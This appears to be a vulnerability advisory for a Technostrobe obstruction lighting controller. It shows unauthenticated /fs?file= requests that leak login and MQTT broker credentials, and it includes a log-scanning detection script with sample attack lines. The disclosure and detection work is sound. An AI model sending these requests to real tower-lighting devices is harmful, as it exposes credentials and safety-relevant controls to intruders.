| Title | Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure |
|---|---|

Description

Sensitive files are accessible without authentication via direct HTTP requests.

Example Request:

```http
GET /config/system.cfg HTTP/1.1
Host: <target>
```

Example Response:

```
username=admin
password=admin123
```
Bug 2.0.1 — Credential File Exposed (/login.cfg)

The Request

```http
GET http://technostrobe.shiky.demo:58746/fs?file=%2Flogin.cfg
```

URL-decoded: `GET /fs?file=/login.cfg`

```
┌─────────────┐                              ┌──────────────────┐
│             │   GET /fs?file=/login.cfg    │                  │
│  Attacker   │ ───────────────────────────▶ │   /fs endpoint   │
│ (no creds)  │                              │ (no auth check)  │
│             │ ◀──────── file contents ──── │                  │
└─────────────┘                              └──────────────────┘
```

What the Response Looks Like

The login.cfg file contains user accounts and their passwords. The passwords are stored in Base64 encoding, which is a reversible encoding rather than a hash or encryption, so anyone who retrieves the file recovers the plaintext password directly.

```
# login.cfg — served freely to anyone who asks
userId=0001
password=MDAwMTAxNGE0NQ==   # base64
role=admin
```
Bug 2.1.1 — MQTT Broker Configuration Exposed

The Request

```http
GET http://technostrobe.shiky.demo:58746/fs?file=%2Fconfig%2FMQTTBroker.cfg
```

URL-decoded: `GET /fs?file=/config/MQTTBroker.cfg`

What Is MQTT?

```
┌────────────────────────────────────────────────────────────┐
│ MQTT IN TOWER LIGHTING                                     │
│                                                            │
│ Tower Light ──[MQTT publish]──▶ Broker ──[subscribe]──▶ NOC│
│                                                            │
│ Topics might include:                                      │
│   • tower/lights/status     (light on/off/fault)           │
│   • tower/psu/voltage       (power supply health)          │
│   • tower/alarms/active     (fault alerts)                 │
│   • tower/control/command   (⚠️ incoming commands)         │
└────────────────────────────────────────────────────────────┘
```

What the Config File Contains

```ini
# /config/MQTTBroker.cfg — served freely to anyone who asks
[broker]
host = mqtt.operations.example.com
port = 1883
clientId = technostrobe-07223277T4O5BH
[auth]
username = tower_device_01
password = Twr0$ec2018!
[topics]
publish = tower/hiled/status
subscribe = tower/hiled/control
```
Root Cause

The web server exposes internal files without enforcing authentication or access restrictions.

Impact

- Disclosure of credentials
- Exposure of configuration data
- Enables further attacks such as authentication bypass
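For operators who cannot patch immediately, the request pattern above is easy to alert on. The following is an added example, not code from the report or from the vendor: it scans web-server access-log lines for successful reads through the /fs endpoint whose URL-decoded file parameter names a credential or configuration file; the Combined Log Format, the watch-list of paths and the sample log lines are constructed assumptions.

```python
"""Flag unauthenticated reads of sensitive files via the /fs?file= endpoint.
Added example, not from the report or vendor; log format, watch-list and
sample lines below are constructed assumptions."""
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Files the report shows being served without authentication (constructed watch-list).
SENSITIVE_PATHS = {"/login.cfg", "/config/mqttbroker.cfg", "/config/system.cfg"}

# Assumed Combined Log Format: ip ident user [ts] "METHOD url proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def requested_file(url):
    """Return the canonical path named by a /fs?file=... URL, or None."""
    parts = urlsplit(url)
    if parts.path != "/fs":
        return None
    values = parse_qs(parts.query).get("file")
    if not values:
        return None
    # parse_qs already decodes %2F; a second unquote catches double-encoded clients.
    raw = unquote(values[0])
    # Anchor at the root and collapse "." / ".." so every spelling maps to one path.
    return normpath("/" + raw.lstrip("/"))

def is_sensitive(path):
    return path.lower() in SENSITIVE_PATHS

def find_exposures(log_lines):
    """Return (ip, timestamp, path) for each successful (2xx) sensitive /fs read."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        path = requested_file(m["url"])
        if path and is_sensitive(path) and m["status"].startswith("2"):
            hits.append((m["ip"], m["ts"], path))
    return hits

# Constructed sample lines modelled on the requests shown in the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Mar/2026:01:19:02 +0000] "GET /fs?file=%2Flogin.cfg HTTP/1.1" 200 58 "-" "curl/8.5"',
    '203.0.113.7 - - [20/Mar/2026:01:19:05 +0000] "GET /fs?file=%2Fconfig%2FMQTTBroker.cfg HTTP/1.1" 200 214 "-" "curl/8.5"',
    '198.51.100.4 - - [20/Mar/2026:01:20:11 +0000] "GET /fs?file=%2Fstatus.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Mar/2026:01:20:12 +0000] "GET /fs?file=login.cfg HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
]
```

Calling `find_exposures(SAMPLE_LOG)` returns three hits: the two requests from the report and the unencoded `login.cfg` variant, which the path normalisation maps to the same file.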
| Field | Value |
|---|---|
| Source | https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-03-InfoDisclosure.md |
| User | shiky8 (UID 96565) |
| Submitted | 2026-03-20 01:19 AM (21 days ago) |
| Moderation | 2026-04-04 04:41 PM (16 days later) |
| Status | Accepted |
| VulDB Entry | 355341 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Configuration Data /fs File Information Disclosure] |
| Points | 20 |